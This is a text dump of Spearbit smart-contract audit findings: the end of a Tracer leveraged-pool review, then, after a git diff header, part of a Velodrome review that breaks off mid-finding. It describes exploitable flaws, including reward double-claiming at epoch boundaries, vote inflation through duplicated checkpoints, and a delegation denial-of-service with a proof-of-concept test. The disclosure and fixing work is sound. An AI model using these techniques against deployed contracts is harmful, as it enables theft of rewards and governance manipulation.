coupling between LeveragedPool and PoolCommitter Severity: Informational Context: LeveragedPool, PoolCommitter Description: The LeveragedPool and PoolCommitter contracts call each other back and forth. This could be optimized to make the code clearer and perhaps save some gas. Here is an example: contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function poolUpkeep(...) external override onlyKeeper { ... IPoolCommitter(poolCommitter).executeCommitments(_boundedIntervals, _numberOfIntervals); ... } } contract PoolCommitter is IPoolCommitter, Initializable { function executeCommitments(...) external override onlyPool { ... uint256 lastPriceTimestamp = pool.lastPriceTimestamp(); uint256 updateInterval = pool.updateInterval(); ... } } // call to first contract // call to first contract Recommendation: If contract LeveragedPool calls contract PoolCommitter and contract PoolCommitter calls back to contract LeveragedPool to get some values, it should be considered to send all relevant values from LeveragedPool to PoolCommitter in the first call. Tracer: Valid, fixed by multiple commits in PR 393. Spearbit: Looks good, with some thoughts: • There are quite a lot of changes, so it is important to have tests that verify that everything still works as expected. • It might be useful to add the checks for 0 mints again (e.g. if (longMintAmount > 0) and if (shortMintA- mount > 0)). • The checkInvariantsBeforeFunction() modifier of mintTokens() is not called, although poolUpkeep() calls the checkInvariantsAfterFunction() modifier, so that should not be a problem. • Why is balancesAndSupplies used? It was already there in the previous versions. Is this to prevent stack to deep errors? • It seems like a lot of variables are used, but that can not be simplified further because the old and the new values are needed for most of them. Tracer: There are quite a lot of changes, so it is important to have tests that verify that everything still works as expected. Agreed. We are fairly confident that our existing tests cover the changes, e.g. happening, this one checks for long balance being updated, etc. this test ensures minting is still It might be useful to add the checks for 0 mints again (e.g. if (longMintAmount > 0) and if (short- MintAmount > 0)). Agreed. Why is balancesAndSupplies used? It was already there in the previous versions. Is this to prevent stack to deep errors? 40 Yes, that is correct. An alternative solution is to have different functions for processing long burn, long mint, etc. but we figured that would add a reasonable amount of complexity in regards to keeping track of the variables that get updated after each of these numbers are calculated. Spearbit: Acknowledged, checks for 0 mints (e.g. if (longMintAmount > 0) and if (shortMintAmount > 0) ) were added. +5.6.3 Code in SMA() is hard to read Severity: Informational Context: SMAOracle.sol#L124-L142 Description: The SMA() function checks for k being smaller or equal to uint256(type(int256).max), a value somewhat difficult to read. Additionally, the number 24 is hardcoded. Note: This issue was also mentioned in Runtime Verification report: B15 PriceObserver - avoid magic values function SMA( int256[24] memory xs, uint256 n, uint256 k) public pure returns (int256) { ... require(k > 0 && k <= n && k <= uint256(type(int256).max), "SMA: Out of bounds"); ... for (uint256 i = n - k; i < n; i++) { S += xs[i]; } ... } Recommendation: Code should be changed to: - + - + memory xs, uint256 n, uint256 k) public pure returns (int256) { function SMA( int256[24] function SMA( int256[MAX_NUM_ELEMS] memory xs, uint256 n, uint256 k) public pure returns (int256) { ... require(k > 0 && k <= n && k <= uint256(type(int256).max), "SMA: Out of bounds"); require(k > 0 && k <= n && n <= MAX_NUM_ELEMS, "SMA: Out of bounds"); ... for (uint256 i = n - k; i < n; i++) { S += xs[i]; } ... } Note: && n <= MAX_NUM_ELEMS could also be removed, because array boundary checks will give an error message if n is too large. Tracer: We are submitting PR 406 as a mitigation for this. It is a slightly larger PR than we originally intended so as a result it will likely be submitted for several defects here. We would appreciate if each defect could be assessed against it. Spearbit: Acknowledged, readability has improved. 41 +5.6.4 Code is chain-dependant due to fixed block time and no support for EIP-1559 Severity: Informational Context: PoolKeeper Description: The PoolKeeper contract has several hardcoded assumptions about the chain on which it will be deployed. It has no support for EIP-1559 and doesn’t use block.basefee. On Ethereum Mainnet the blocktime will change to 12 seconds with the ETH2 merge. The Secureum CARE-X report also has an entire discussion about other chains. contract PoolKeeper is IPoolKeeper, Ownable { ... uint256 public constant BLOCK_TIME = 13; /* in seconds */ ... /// Captures fixed gas overhead for performing upkeep that's unreachable /// by `gasleft()` due to our approach to error handling in that code uint256 public constant FIXED_GAS_OVERHEAD = 80195; ... } Recommendation: Code should be as generic as possible to support multiple chains and future changes. At the very least, assumptions made for different chains should be documented. Tracer: We have decided that we will not fix this for V2 launch, but it is something that we as a dev team hold quite a disdain for, and we plan to generalise and remove assumptions in the next version. We’ve added a NatSpec in PR 405. Spearbit: Acknowledged. +5.6.5 ABDKQuad-related constants defined outside PoolSwapLibrary Severity: Informational Context: PoolCommitter.sol#L24, PoolCommitter.sol#L31 Description: Some ABDKQuad-related constants are defined outside of the PoolSwapLibrary while others are shadowing the ones defined inside the library. As all ABDKQuad-related logic is contained in the library it’s less error prone to have any ABDKQuad-related definitions in the same file. The constant one is lowercase, while usually constants are uppercase. contract PoolCommitter is IPoolCommitter, Initializable { bytes16 public constant one = 0x3fff0000000000000000000000000000; ... // Set max minting fee to 100%. This is a ABDKQuad representation of 1 * 10 ** 18 bytes16 public constant MAX_MINTING_FEE = 0x403abc16d674ec800000000000000000; } library PoolSwapLibrary { /// ABDKMathQuad-formatted representation of the number one bytes16 public constant one = 0x3fff0000000000000000000000000000; } Recommendation: Code should be changed to: 42 contract PoolCommitter is IPoolCommitter, Initializable { - bytes16 public constant one = 0x3fff0000000000000000000000000000; ... bytes16 public constant MAX_MINTING_FEE = 0x403abc16d674ec800000000000000000; bytes16 public constant MAX_MINTING_FEE = ABDK1E18; - + } library PoolSwapLibrary { /// ABDKMathQuad-formatted representation of the number one bytes16 public constant one = 0x3fff0000000000000000000000000000; bytes16 public constant ONE = 0x3fff0000000000000000000000000000; // This is an ABDKQuad representation of 1 * 10 ** 18 bytes16 public constant ABDK1E18= 0x403abc16d674ec800000000000000000; - + + + } Tracer: Valid, fixed in PR 329. +5.6.6 Lack of a state to allow withdrawal of tokens Severity: Informational Context: LeveragedPool.sol#L516 Description: Immediately after the invariants don’t hold and the pool has been paused, Governance can withdraw the collateral (quote). It might be prudent to create a separate state besides paused, such that unpause actions can’t happen anymore to indicate withdrawal intention. Note: the comment in withdrawQuote() is incorrect. Pool must be paused. /** ... * @dev Pool must not be paused // comment not accurate ... */ ... function withdrawQuote() external onlyGov { require(paused, "Pool is live"); IERC20 quoteERC = IERC20(quoteToken); uint256 balance = quoteERC.balanceOf(address(this)); IERC20(quoteToken).safeTransfer(msg.sender, balance); emit QuoteWithdrawn(msg.sender, balance); } Recommendation: The creation of a separate state besides paused, to be able to withdraw the quote, should be considered. This new state should have its own requirements for transitioning from the pause state. The comments of withdrawQuote() should be updated. Tracer: We have decided that we are happy with the two states as they are. Since the pool can now only enter a paused state from invariant checking failing, we would prefer to be able to withdraw the settlement tokens without a timelock. Spearbit: Acknowledged. 43 +5.6.7 Undocumented frontrunning protection Severity: Informational Context: PoolFactory.sol#L93-L174, PoolFactory.sol#L183-L203 Description: PoolFactory deployPool() per(deploymentParameters.oracleWrapper).deployer() == msg.sender frontrunning the deployment transaction of the pool. function the In of contract, check the protects IOracleWrap- against This is because the poolCommitter, LeveragedPool and the pair tokens’ instances are deployed at a deterministic address, calculated from the values of leverageAmount, quoteToken and oracleWrapper. An attacker cannot frontrun the pool deployment because of the different msg.sender address, that causes the deployer() check to fail. Alternatively, the attacker will have a different oracleWrapper, resulting in a different pool. However, this is not obvious to a casual reader. function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... require( IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender, "Deployer must be oracle wrapper owner" ); ... bytes32 uniquePoolHash = keccak256( abi.encode( deploymentParameters.leverageAmount, deploymentParameters.quoteToken, deploymentParameters.oracleWrapper ) ); PoolCommitter poolCommitter = PoolCommitter( Clones.cloneDeterministic(poolCommitterBaseAddress, uniquePoolHash) ); ... LeveragedPool pool = LeveragedPool(Clones.cloneDeterministic(poolBaseAddress, uniquePoolHash)); ... } function deployPairToken(... ) internal returns (address) { ... bytes32 uniqueTokenHash = keccak256( abi.encode( deploymentParameters.leverageAmount, deploymentParameters.quoteToken, deploymentParameters.oracleWrapper, direction ) ); PoolToken pairToken = PoolToken(Clones.cloneDeterministic(pairTokenBaseAddress, ,! uniqueTokenHash)); ... } Recommendation: A comment should be added to the deployPool() function explaining to users how the fron- trunning prevention works. Additionally, this will save time to future auditors and developers. Tracer: Fixed by documenting frontrunning protection in PR 404. 44 +5.6.8 No event exists for users self-claiming commits Severity: Informational Context: AutoClaim.sol#L33-49 Description: There is no event emitted when a user self-claims a previous commit for themselves, in contrast to claim() which does emit the PaidRequestExecution event. Recommendation: A PaidRequestExecution event should be emitted. + emit PaidRequestExecution(user, msg.sender, request.reward); Tracer: Valid, will address. +5.6.9 Mixups of types and scaling factors Severity: Informational Context: PoolSwapLibrary.sol#L4 Description: There are a few findings that are related to mixups of types or scaling factors. The following types and scaling factors are used: • uint (no scaling) • uint (WAD scaling) • ABDKMathQuad • ABDKMathQuad (WAD scaling) Solidity >0.8.9’s user defined value types could be used to prevent mistakes. This will require several typecasts, but they don’t add extra gas costs. Recommendation: The use of user defined value types should be considered. Tracer: Agreed. +5.6.10 Missing events for setInvariantCheck() and setAutoClaim() in PoolFactory Severity: Informational Context: PoolFactory.sol#L224-L227, PoolFactory.sol#L235-L238, Description: Events should be emitted for access-controlled critical functions, and functions that set protocol parameters or affect the protocol in significant ways. Recommendation: Events should be emitted in those functions. Tracer: Valid, fixed in issue 372. Spearbit: Acknowledged. 45 +5.6.11 Terminology used for tokens and oracles is not clear and consistent across codebase Severity: Informational Context: PoolSwapLibrary.sol#L406-L431, PoolKeeper.sol#L276-L281 Description: Different terms are used across the codebase to address the different tokens, leading to some mixups. Assuming a pair BTC/USDC is being tracked with WETH as collateral, we think the following definitions apply: • collateral token == quote token == settlement token == WETH • pool token == long token + short token == long BTC/USDC + short BTC/USDC As for the oracles: • settlementEthOracle is the oracle for settlement in ETH (WETH/ETH) • oracleWrapper is the oracle for BTC/USDC Here is an example of a mixup: The comments in getMint() and getBurn() are different while their result should be similar. It seems the comment on getBurn() has reversed settlement and pool tokens. * @notice Calculates the number of pool tokens to mint, given some settlement token amount and a ,! price ... * @return Quantity of pool tokens to mint ... function getMint(bytes16 price, uint256 amount) public pure returns (uint256) { ... } * @notice Calculate the number of settlement tokens to burn, based on a price and an amount of ,! pool tokens //settlement & pool seem reversed ... * @return Quantity of pool tokens to burn ... function getBurn(bytes16 price, uint256 amount) public pure returns (uint256) { ... } The settlementTokenPrice variable in keeperGas() is misleading and not clear whether it is Eth per Settlement or Settlement per Eth. contract PoolKeeper is IPoolKeeper, Ownable { function keeperGas(..) public view returns (uint256) { int256 settlementTokenPrice = ,! IOracleWrapper(ILeveragedPool(_pool).settlementEthOracle()).getPrice(); ... } } Recommendation: Consistent terminology should be used throughout the code, and checks should be made to prevent potential mixups. settlementTokenPrice should be changed to settlementPerEth: 46 contract PoolKeeper is IPoolKeeper, Ownable { function keeperGas(..) public view returns (uint256) { int256 settlementTokenPrice = IOracleWrapper(ILeveragedPool(_pool).settlementEthOracle()).getPrice(); int256 settlementPerEth = IOracleWrapper(ILeveragedPool(_pool).settlementEthOracle()).getPrice(); ... } - ,! + ,! } Tracer: Agreed and valid. Will address. +5.6.12 Incorrect NatSpec and comments Severity: Informational Context: PoolSwapLibraryL283-L293, LeveragedPool.sol#L511, LeveragedPool.sol#L47 Description: Some NatSpec documentation and comments contain incorrect or unclear information. In PoolSwapLibraryL283-L293, the NatSpec for the isBeforeFrontRunningInterval() function refers to uncom- mitment, which is not longer supported. * @notice Returns true if the given timestamp is BEFORE the frontRunningInterval starts, * function isBeforeFrontRunningInterval(...) which is allowed for uncommitment. In LeveragedPool.sol#L511 the NatSpec for the withdrawQuote() function notes that the pool should not be paused while the require checks that it is paused. * @dev Pool must not be paused function withdrawQuote() ... { require(paused, "Pool is live"); In LeveragedPool.sol#L47 the comment is unclear, as it references a singular update interval but the mapping points to arrays. // The most recent update interval in which a user committed mapping(address => uint256[]) public unAggregatedCommitments; In PoolToken.sol#L16-L23 both the order and the meaning of the documentation are wrong. • The @param lines order should be switched. • @param amount Pool tokens to burn should be replaced with @param amount Pool tokens to mint • @param account Account to burn pool tokens to should be replaced with @param account Account to mint pool tokens to /** * @notice Mints pool tokens - * @param amount Pool tokens to burn - * @param account Account to burn pool tokens to + * @param account Account to mint pool tokens to + * @param amount Pool tokens to mint */ function mint(address account, uint256 amount) external override onlyOwner { ... } In PoolToken.sol#L25-L32 the order of the @param lines is reversed. 47 /** * @notice Burns pool tokens - * @param amount Pool tokens to burn - * @param account Account to burn pool tokens from + * @param account Account to burn pool tokens from + * @param amount Pool tokens to burn */ function burn(address account, uint256 amount) external override onlyOwner { ... } In PoolFactory.sol#L176-L203 the NatSpec @param for poolOwner is missing. It would also be suggested to change the parameter name from poolOwner to pool, since the parameter received from deployPool is the address of the pool and not the owner of the pool. /** * @notice Deploy a contract for pool tokens + * @param pool The pool address, owner of the Pool Token * @param leverage Amount of leverage for pool * @param deploymentParameters Deployment parameters for parent function * @param direction Long or short token, L- or S- * @return Address of the pool token */ function deployPairToken( - + address poolOwner, address pool, string memory leverage, PoolDeployment memory deploymentParameters, string memory direction ) internal returns (address) { ... pairToken.initialize(poolOwner, poolNameAndSymbol, poolNameAndSymbol, settlementDecimals); pairToken.initialize(pool, poolNameAndSymbol, poolNameAndSymbol, settlementDecimals); ... - + } In PoolSwapLibrary.sol#L433-L454 the comments for two of the parameters of function getMintWithBurns() are reversed. * @param amount ... * @param oppositePrice ... ... function getMintWithBurns( ... bytes16 oppositePrice, uint256 amount, ... ) public pure returns (uint256) { ... In ERC20_Cloneable.sol#L46-L49 a comment at the constructor of contract ERC20_Cloneable mentions a default value of 18 for decimals. However, it doesn’t use this default value, but the supplied parameter. Moreover, a comment at the constructor of ERC20_Cloneable contract mentions _setupDecimals. This is probably a reference to an old version of the OpenZeppelin ERC20 contracts, and no longer relevant. Additionally, the comments say the values are immutable, but they are set in the initialize() function. 48 @dev Sets the values for {name} and {symbol}, initializes {decimals} with * a default value of 18. * To select a different value for {decimals}, use {_setupDecimals}. * * construction. All three of these values are immutable: they can only be set once during ... constructor(string memory name_, string memory symbol_, uint8 decimals_) ERC20(name_, symbol_) { _decimals = decimals_; } function initialize(address _pool, string memory name_, string memory symbol_, uint8 decimals_) ,! external initializer { owner = _pool; _name = name_; _symbol = symbol_; _decimals = decimals_; } Recommendation: NatSpec and comments should be corrected. Tracer: Valid, addressed in issue 376. Spearbit: Acknowledged. 49 6 Additional Comments 50 7 Appendix 51 diff --git a/findings_newupdate/spearbit/Velodrome-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Velodrome-Spearbit-Security-Review.txt new file mode 100644 index 0000000..fe632c2 --- /dev/null +++ b/findings_newupdate/spearbit/Velodrome-Spearbit-Security-Review.txt @@ -0,0 +1,119 @@ +5.1.1 Reward calculates earned incorrectly on each epoch boundary Severity: Critical Risk Context: Reward.sol#L161-L192 Description: Rewards are allocated on a per epoch basis to users in proportion to their total deposited amount. Because the balance and total supply used for rewards is based on _currTs % WEEK + WEEK, the values will not represent the end of the current epoch, but instead the first second of the next epoch. As a result, if a user deposits at any epoch boundary, their deposited amount will actually contribute to the check- pointed total supply of the prior epoch. This leads to a few issues which are detailed below: • Users who deposit in the first second of the next epoch will dilute the total supply for the prior epoch while not being eligible to claim rewards for that same epoch. Consequently, some rewards will be left unclaimed and locked within the contract as the tokenRewardsPerEpoch mapping is used to store reward amounts so unclaimed rewards will not roll over to future epochs. • Users can also avoid zero numEpochs by depositing a negligible amount at an earlier epoch for multiple ac- counts before attempting to deposit a larger amount at _currTs % WEEK == 0. The same user can withdraw their deposit from the VotingEscrow contract with the claimed rewards and re-deposit these funds into an- other account in the same block. They are able to abuse this issue to claim all rewards allocated to each epoch. • In a similar fashion, reward distributions that are weighted by users' votes in the Voter contract can suffer the same issue as outlined above. If the attacker votes some negligible amount on various pools using several accounts, they can increase the vote, claim, reset the vote and re-vote via another account to claim rewards multiple times. The math below shows that _currTs + WEEK is indeed the first second of the next epoch and not the last of the prior epoch. 6 uint256 internal constant WEEK = 7 days; function epochStart(uint256 timestamp) internal pure returns (uint256) { return timestamp - (timestamp % WEEK); } epochStart(123) Type: uint Hex: 0x0 Decimal: 0 epochStart(100000000) Type: uint Hex: 0x5f2b480 Decimal: 99792000 WEEK Type: uint Hex: 0x93a80 Decimal: 604800 epochStart(WEEK) Type: uint Hex: 0x93a80 Decimal: 604800 epochStart(1 + WEEK) Type: uint Hex: 0x93a80 Decimal: 604800 epochStart(0 + WEEK) Type: uint Hex: 0x93a80 Decimal: 604800 epochStart(WEEK - 1) Type: uint Hex: 0x0 Decimal: 0 Recommendation: Both lines which query the user's prior balance and total supply for each given epoch can be replaced to check only the last second of the epoch: if (numEpochs > 0) { for (uint256 i = 0; i < numEpochs; i++) { // get index of last checkpoint in this epoch _index = getPriorBalanceIndex(tokenId, _currTs + DURATION - 1); _index = getPriorBalanceIndex(tokenId, _currTs + DURATION); // get checkpoint in this epoch cp0 = checkpoints[tokenId][_index]; // get supply of last checkpoint in this epoch _supply = Math.max(supplyCheckpoints[getPriorSupplyIndex(_currTs + DURATION - 1)].supply, 1); _supply = Math.max(supplyCheckpoints[getPriorSupplyIndex(_currTs + DURATION)].supply, 1); reward += (cp0.balanceOf * tokenRewardsPerEpoch[token][_currTs]) / _supply; _currTs += DURATION; + - + - } } This will ensure that users who deposit at the start of the following epoch will not be eligible for rewards or dilute the supply when block.timestamp % WEEK == 0. Velodrome: Fixed in commit 02e0bc. Spearbit: Verified. 7 5.2 High Risk +5.2.1 DOS attack by delegating tokens at MAX_DELEGATES = 1024 Severity: High Risk Context: VotingEscrow.sol#L1212 Description: Any user can delegate the balance of the locked NFT amount to anyone by calling delegate. As the delegated tokens are maintained in an array that's vulnerable to DOS attack, the VotingEscrowhas a safety check of MAX_DELEGATES = 1024 preventing an address from having a huge array. Given the current implementation, any user with 1024 delegated tokens takes approximately 23M gas to transfer/burn/mint a token. However, the current gas limit of the op chain is 15M. (ref: Op-scan) • The current votingEscrow has a limit of MAX_DELEGATES=1024. it's approx 23M to transfer/withdraw a token when there are 1024 delegated voting on a token. • It's cheaper to delegate from an address with a shorter token list to an address with a longer token list. => If someone trying to attack a victim's address by creating a new address, a new lock, and delegating to the victim. By the time the attacker hit the gas limit, the victim can not withdraw/transfer/delegate. Recommendation: There's currently no clear hard limit of block size in OP's spec. There's also a chance the OP's sequencer will include a jumbo tx if funds get locked because of out of gas. Nevertheless, there's no precedent example of such cases and it's not a desirable situation for users to deal with the risks. Hence recommend to take to: 1. Adjust the MAX_DELEGATES=1024to 128; 2. Give an option for users to opt-out/opt-in. Users will only accept the delegated tokens if they opt-in; or users can opt-out to refuse any uncommissioned delegated tokens. Also, recommend adding the following test in VotingEscrow.t.sol contract VotingEscrowTest is BaseTest { function testDelegateLimitAttack() public { vm.prank(address(owner)); VELO.transfer(address(this), TOKEN_1M); VELO.approve(address(escrow), type(uint256).max); uint tokenId = escrow.createLock(TOKEN_1, 7 days); for(uint256 i = 0; i < escrow.MAX_DELEGATES() - 1; i++) { vm.roll(block.number + 1); vm.warp(block.timestamp + 2); address fakeAccount = address(uint160(420 + i)); VELO.transfer(fakeAccount, 1 ether); vm.startPrank(fakeAccount); VELO.approve(address(escrow), type(uint256).max); escrow.createLock(1 ether, MAXTIME); escrow.delegate(address(this)); vm.stopPrank(); } vm.roll(block.number + 1); vm.warp(block.timestamp + 7 days); uint initialGas = gasleft(); escrow.withdraw(tokenId); uint gasUsed = initialGas - gasleft(); // @audit: setting 10_000_000 to demonstrate the issue. 2~3M gas limit would be a safer range. assertLt(gasUsed, 10_000_000); } } Velodrome: Fixed in commit 0b47fe. Delegation was reworked to use static balances so that it would no longer have a limit. This required the introduction of permanent locks which are locks that do not decay. Spearbit: Verified 8 +5.2.2 Inflated voting balance due to duplicated veNFTs within a checkpoint Severity: High Risk Context: VotingEscrow.sol#L1309, VotingEscrow.sol#L1364 Description: Note: This issue affects VotingEscrow._moveTokenDelegates and VotingEscrow._moveAllDele- gates functions A checkpoint can contain duplicated veNFTs (tokenIDs) under certain circumstances leading to double counting of voting balance. Malicious users could exploit this vulnerability to inflate the voting balance of their accounts and participate in governance and gauge weight voting, potentially causing loss of assets or rewards for other users if the inflated voting balance is used in a malicious manner (e.g. redirect rewards to gauges where attackers have a vested interest). Following is the high-level pseudo-code of the existing _moveTokenDelegates function, which is crucial for under- standing the issue. 1. Assuming moving tokenID=888 from Alice to Bob. 2. Source Code Logic (Moving tokenID=888 out of Alice) • Fetch the existing Alice's token IDs and assign them to srcRepOld • Create a new empty array = srcRepNew • Copy all the token IDs in srcRepOld to srcRepNew except for tokenID=888 3. Destination Code Logic (Moving tokenID=888 into Bob) • Fetch the existing Bobs' token IDs and assign them to dstRepOld • Create a new empty array = dstRepNew • Copy all the token IDs in dstRepOld to dstRepNew • Copy tokenID=888 to dstRepNew The existing logic works fine as long as a new empty array (srcRepNew OR dstRepNew) is created every single time. The code relies on the _findWhatCheckpointToWrite function to return the index of a new checkpoint. function _moveTokenDelegates( ..SNIP.. uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep); uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds; However, the problem is that the _findWhatCheckpointToWrite function does not always return the index of a new checkpoint (Refer to Line 1357 below). It will return the last checkpoint if it has already been written once within the same block. function _findWhatCheckpointToWrite(address account) internal view returns (uint32) { uint256 _blockNumber = block.number; uint32 _nCheckPoints = numCheckpoints[account]; if (_nCheckPoints > 0 && _checkpoints[account][_nCheckPoints - 1].fromBlock == _blockNumber) { return _nCheckPoints - 1; } else { return _nCheckPoints; } } If someone triggers the _moveTokenDelegates more than once within the same block (e.g. perform NFT transfer twice to the same person), the _findWhatCheckpointToWrite function will return a new checkpoint in the first transfer but will return the last/previous checkpoint in the second transfer. This will cause the move token delegate logic to be off during the second transfer. 9 First Transfer at Block 1000 Assume the following states: numCheckpoints[Alice] = 1 _checkpoints[Alice][0].tokenIds = [n1, n2] <== Most recent checkpoint numCheckpoints[Bob] = 1 _checkpoints[Bob][0].tokenIds = [n3] <== Most recent checkpoint To move tokenID=2 from Alice to Bob, the _moveTokenDelegates(Alice, Bob, n2) function will be triggered. The _findWhatCheckpointToWrite will return the index of 1 which points to a new array. The end states of the first transfer will be as follows: numCheckpoints[Alice] = 2 _checkpoints[Alice][0].tokenIds = [n1, n2] _checkpoints[Alice][1].tokenIds = [n1] <== Most recent checkpoint numCheckpoints[Bob] = 2 _checkpoints[Bob][0].tokenIds = [n3] _checkpoints[Bob][1].tokenIds = [n2, n3] <== Most recent checkpoint Everything is working fine at this point in time. Second Transfer at Block 1000 (same block) To move tokenID=1 from Alice to Bob, the _moveTokenDelegates(Alice, Bob, n1) function will be triggered. This time round since the last checkpoint block is the same as the current block, the _findWhatCheckpointToWrite function will return the last checkpoint instead of a new checkpoint. The srcRepNew and dstRepNew will end up referencing the old checkpoint instead of a new checkpoint. As such, the srcRepNew and dstRepNew array will reference back to the old checkpoint _checkpoints[Alice][1].tokenIds and _checkpoints[Bob][1].tokenIds respectively. The end state of the second transfer will be as follows: numCheckpoints[Alice] = 3 _checkpoints[Alice][0].tokenIds = [n1, n2] _checkpoints[Alice][1].tokenIds = [n1] <== Most recent checkpoint numCheckpoints[Bob] = 3 _checkpoints[Bob][0].tokenIds = [n3] _checkpoints[Bob][1].tokenIds = [n2, n3, n2, n3, n1] <== Most recent checkpoint Four (4) problems could be observed from the end state: 1. The numCheckpoints is incorrect. Should be two (2) instead to three (3) 2. TokenID=1 has been added to Bob's Checkpoint, but it has not been removed from Alice's Checkpoint 3. Bob's Checkpoint contains duplicated tokenIDs (e.g. there are two TokenID=2 and TokenID=3) 4. TokenID is not unique (e.g. TokenID appears more than once) Since the token IDs within the checkpoint will be used to determine the voting power, the voting power will be inflated in this case as there will be a double count of certain NFTs. function _moveTokenDelegates( ..SNIP.. uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep); uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds; 10 Additional Comment about nextSrcRepNum variable and _findWhatCheckpointToWrite function In Line 1320 below, the code wrongly assumes that the _findWhatCheckpointToWrite function will always return the index of the next new checkpoint. The _findWhatCheckpointToWrite function will return the index of the latest checkpoint instead of a new one if block.number == checkpoint.fromBlock. function _moveTokenDelegates( address srcRep, address dstRep, uint256 _tokenId ) internal { if (srcRep != dstRep && _tokenId > 0) { if (srcRep != address(0)) { uint32 srcRepNum = numCheckpoints[srcRep]; uint256[] storage srcRepOld = srcRepNum > 0 ? _checkpoints[srcRep][srcRepNum - 1].tokenIds : _checkpoints[srcRep][0].tokenIds; uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep); uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds; Additional Comment about numCheckpoints In Line 1330 below, the function computes the new number of checkpoints by incrementing the srcRepNum by one. However, this is incorrect because if block.number == checkpoint.fromBlock, then the number of checkpoints remains the same and does not increment. function _moveTokenDelegates( address srcRep, address dstRep, uint256 _tokenId ) internal { if (srcRep != dstRep && _tokenId > 0) { if (srcRep != address(0)) { uint32 srcRepNum = numCheckpoints[srcRep]; uint256[] storage srcRepOld = srcRepNum > 0 ? _checkpoints[srcRep][srcRepNum - 1].tokenIds : _checkpoints[srcRep][0].tokenIds; uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep); uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds; // All the same except _tokenId for (uint256 i = 0; i < srcRepOld.length; i++) { uint256 tId = srcRepOld[i]; if (tId != _tokenId) { srcRepNew.push(tId); } } numCheckpoints[srcRep] = srcRepNum + 1; } Recommendation: Update the move token delegate logic within the affected functions (VotingEscrow._moveTok- enDelegates and VotingEscrow._moveAllDelegates) to ensure that the latest checkpoint is overwritten correctly when the functions are triggered more than once within a single block. Further, ensure that the following invariants hold in the new code: • No duplicated veNFTs (tokenIDs) within a checkpoint • When moving a tokenID, it must be deleted from the source tokenIds list and added to the destination tokenIds list • No more than one checkpoint within the same block for an account. Otherwise, the binary search within the VotingEscrow.getPastVotesIndex will return an incorrect number of votes 11 Sidenote: Another separate issue is that the fromBlock of a checkpoint is not set anywhere in the codebase. Therefore, the _findWhatCheckpointToWrite function will always create and return a new checkpoint, which is not working as intended. This issue will be raised in another report "The fromBlock variable of a checkpoint is not initialized". Since the remediation of this issue also depends on fixing the fromBlock problem, this is being highlighted here again for visibility. Velodrome: Fixed in commit a670bf. Spearbit: Verified. +5.2.3 Rebase rewards cannot be claimed after a veNFT expires Severity: High Risk Context: RewardsDistributor.sol#L271, RewardsDistributor.sol#L283 Description: Note: This issue affects both the RewardsDistributor.claim and RewardsDistributor.claimMany functions A user will claim their rebase rewards via the RewardsDistributor.claim function, which will trigger the VotingE- scrow.deposit_for function. function claim(uint256 _tokenId) external returns (uint256) { if (block.timestamp >= timeCursor) _checkpointTotalSupply(); uint256 _lastTokenTime = lastTokenTime; _lastTokenTime = (_lastTokenTime / WEEK) * WEEK; uint256 amount = _claim(_tokenId, _lastTokenTime); if (amount != 0) { IVotingEscrow(ve).depositFor(_tokenId, amount); tokenLastBalance -= amount; } return amount; } Within the VotingEscrow.deposit_for function, the require statement at line 812 below will verify that the veNFT performing the claim has not expired yet. function depositFor(uint256 _tokenId, uint256 _value) external nonReentrant { LockedBalance memory oldLocked = _locked[_tokenId]; require(_value > 0, "VotingEscrow: zero amount"); require(oldLocked.amount > 0, "VotingEscrow: no existing lock found"); require(oldLocked.end > block.timestamp, "VotingEscrow: cannot add to expired lock, withdraw"); _depositFor(_tokenId, _value, 0, oldLocked, DepositType.DEPOSIT_FOR_TYPE); } If a user claims the rebase rewards after their veNFT's lock has expired, the VotingEscrow.depositFor function will always revert. As a result, the accumulated rebase rewards will be stuck in the RewardsDistributor contract and users will not be able to retrieve them. Recommendation: Consider sending the claimed VELO rewards to the owner of the veNFT if the veNFT's lock has already expired. 12 function claim(uint256 _tokenId) external returns (uint256) { if (block.timestamp >= timeCursor) _checkpointTotalSupply(); uint256 _lastTokenTime = lastTokenTime; _lastTokenTime = (_lastTokenTime / WEEK) * WEEK; uint256 amount = _claim(_tokenId, _lastTokenTime); if (amount != 0) { IVotingEscrow(ve).depositFor(_tokenId, amount); IVotingEscrow.LockedBalance memory _locked = IVotingEscrow(ve).locked(_tokenId) if (_locked.end < block.timestamp) { address _nftOwner = IVotingEscrow(ve).ownerOf(_tokenId); IERC20(token).transfer(_nftOwner, amount); } else { IVotingEscrow(ve).depositFor(_tokenId, amount); } tokenLastBalance -= amount; } return amount; - + + + + + + + } Velodrome: Fixed in commit 8a71a8. Spearbit: Verified. +5.2.4 Claimed rebase rewards of managed NFT are not compounded within LockedManagedReward Severity: High Risk Context: VotingEscrow.sol#L165, RewardsDistributor.sol#L271 Description: Rebase rewards of a managed NFT should be compounded within the LockedManagedRewards contract. However, this was not currently implemented. When someone calls the RewardsDistributor.claim with a managed NFT, the claimed rebase rewards will be locked via the VotingEscrow.depositFor function (Refer the VotingEscrow.depositFor function fails to notify the LockedManagedRewards contract of the incoming rewards. Thus, the rewards do not accrue in the LockedManagedRewards. to Line 277 below). However, function claim(uint256 _tokenId) external returns (uint256) { if (block.timestamp >= timeCursor) _checkpointTotalSupply(); uint256 _lastTokenTime = lastTokenTime; _lastTokenTime = (_lastTokenTime / WEEK) * WEEK; uint256 amount = _claim(_tokenId, _lastTokenTime); if (amount != 0) { IVotingEscrow(ve).depositFor(_tokenId, amount); tokenLastBalance -= amount; } return amount; } One of the purposes of the LockedManagedRewards contract is to accrue rebase rewards claimed by the man- aged NFT so that the users will receive their pro-rata portion of the rebase rewards based on their contribu- tion to the managed NFT when they withdraw their normal NFTs from the managed NFT via the VotingE- scrow.withdrawManaged function. 13 /// @inheritdoc IVotingEscrow function withdrawManaged(uint256 _tokenId) external nonReentrant { ..SNIP.. uint256 _reward = 